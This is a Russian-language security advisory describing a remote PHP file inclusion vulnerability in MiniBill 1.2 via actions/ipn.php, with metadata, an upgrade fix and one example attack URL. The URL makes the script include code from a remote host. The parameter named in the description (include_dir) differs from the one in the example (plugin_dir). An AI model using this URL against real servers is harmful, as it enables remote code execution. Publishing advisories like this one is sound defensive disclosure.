PHP-инклюдинг в MiniBill

Дата публикации:
31.08.2006
Дата изменения:
24.03.2009
Всего просмотров:
1551
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MiniBill 1.x
Уязвимые версии: MiniBill 1.2:2, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "config[include_dir]" в сценарии actions/ipn.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[Target]/[Path]/actions/ipn.php?config[plugin_dir]=http://cmd.gif?

URL производителя: www.ultrize.com/minibill/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: MiniBill v1.22 Beta Remote File Inclusion Vulnerability

или введите имя

CAPTCHA